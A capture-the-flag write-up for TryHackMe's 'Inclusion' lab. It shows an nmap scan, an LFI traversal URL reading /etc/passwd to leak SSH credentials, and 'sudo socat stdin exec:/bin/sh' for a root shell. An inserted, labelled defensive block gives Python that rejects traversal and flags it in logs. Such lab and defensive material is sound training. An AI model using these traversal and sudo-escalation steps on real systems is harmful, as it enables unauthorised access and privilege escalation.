LFI Inclusion-TryHackMe

This is a write-up for the LFI Inclusion room on TryHackMe, a beginner-level LFI challenge: https://tryhackme.com/room/inclusion
Our task is simple: deploy the machine, find the LFI parameter, and get the user and root flags.
First, check which services are running on the machine:
nmap -sC -sV 10.10.41.78
So we have SSH and a web server running. Let's check the website first.
After some basic browsing of the website we found the following links:
  • http://10.10.41.78/article?name=hacking
  • http://10.10.41.78/article?name=lfiattack
  • http://10.10.41.78/article?name=rfiattack
We have a parameter "name" whose value selects which file is loaded, which makes it a candidate for LFI.
Let's try the following and see if we get anything:
http://10.10.41.78/article?name=../../../../../etc/passwd
and sure enough the file comes back, and it includes credentials for a user.
Let's log in to the box over SSH with these credentials:
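As an added example (not part of the original write-up or of the room's own code), here is how the defending side closes and spots this hole: a hardened article loader that only accepts plain article names for the "name" parameter, and a small scanner that picks traversal attempts out of access-log lines. The article directory path and the log lines are constructed assumptions.

```python
import posixpath
import re
from typing import List, Optional
from urllib.parse import unquote, urlsplit, parse_qs

ARTICLE_DIR = "/var/www/articles"               # assumed location, not from the room
ARTICLE_NAME = re.compile(r"[a-z0-9_-]{1,32}")  # allowlist: plain article slugs only

def safe_article_path(name: str) -> Optional[str]:
    """Return the on-disk path for an article, or None if the name is rejected.
    Two independent layers: an allowlist on the decoded value, then a containment
    check on the normalised path, so relaxing one layer does not reopen the hole."""
    decoded = unquote(unquote(name))            # also catches double-encoded %252e%252e
    if not ARTICLE_NAME.fullmatch(decoded):
        return None
    candidate = posixpath.normpath(posixpath.join(ARTICLE_DIR, decoded))
    if not candidate.startswith(ARTICLE_DIR + "/"):
        return None
    return candidate

def is_traversal_attempt(value: str) -> bool:
    """Flag a query value that, once decoded, steps to a parent directory,
    names an absolute path, or uses backslash separators."""
    decoded = unquote(unquote(value))
    return ".." in decoded.split("/") or decoded.startswith("/") or "\\" in decoded

def suspicious_requests(log_lines: List[str]) -> List[str]:
    """Scan common-log-format lines and return the request paths whose
    'name' parameter looks like a traversal attempt."""
    hits = []
    for line in log_lines:
        m = re.search(r'"GET (\S+) HTTP/', line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)   # parse_qs decodes once
        if any(is_traversal_attempt(v) for v in query.get("name", [])):
            hits.append(m.group(1))
    return hits

# Constructed sample log lines (not taken from the room)
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /article?name=hacking HTTP/1.1" 200 1234',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /article?name=../../../../../etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /article?name=..%252f..%252fetc/passwd HTTP/1.1" 200 2048',
]
```

Running `suspicious_requests(SAMPLE_LOG)` returns the two traversal requests and skips the legitimate one; the same decoded value that the scanner flags is what `safe_article_path` rejects.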
ssh falconfeast@10.10.41.78
We get our user flag in the home directory of the user falconfeast.
Now let's see what we can run with sudo:
sudo -l
Yes, we can run socat as root without a password. Great, let's do some privilege escalation.
Go to https://gtfobins.github.io/ and search for "socat". We found a sudo entry for it.
Let's try what we found to see if we can get a root shell:
sudo socat stdin exec:/bin/sh
We get our root flag as well. Submit both flags :)